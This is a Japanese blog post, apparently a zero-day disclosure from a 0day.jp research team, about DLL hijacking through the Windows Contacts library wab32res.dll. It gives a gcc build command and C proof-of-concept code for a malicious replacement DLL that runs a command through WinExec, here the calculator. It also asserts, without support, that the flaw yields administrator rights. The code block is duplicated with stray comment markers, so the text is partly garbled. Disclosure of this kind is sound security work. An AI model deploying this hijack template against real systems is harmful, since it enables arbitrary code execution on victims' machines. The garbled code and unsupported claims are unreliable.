Microsoft Windows Contacts DLL(wab32res.dll)のハイジャックexploitを発見されまして、現在インターネットで再現情報が交換されている状況です。
「.contact, .group, .p7c, .vcf, と .wab ファイル」を使っているWindpwsOSに影響が出来ます。(wab32res.dll)の中にセキュリティバグがあります、本件の問題を使われたら(wab32res.dll)をincludeされたらシステムのadministrator権限を取られ、他のシステムコマンドを実行する事が出来ます。詰まり下記のやり方です
gcc -shared -o wab32res.dll Contacts-DLL.c
*/
#include <windows.h>
int hax()
{
WinExec("calc", 0);
exit(0);
return 0;
}
*/
#include <windows.h>
int hax()
{
WinExec("calc", 0);
exit(0);
return 0;
}
本問題の解決方法はwab32res.dllのセキュリティパッチが必要ですがメーカーからの対応待ちとなります。パッチが出るまでに本件セキュリティ問題はゼロデイ状況になり、ご認識を下さい。
---
http://0day.jp
ゼロデイ・リサーチチーム
アドリアン・ヘンドリック
0 件のコメント:
コメントを投稿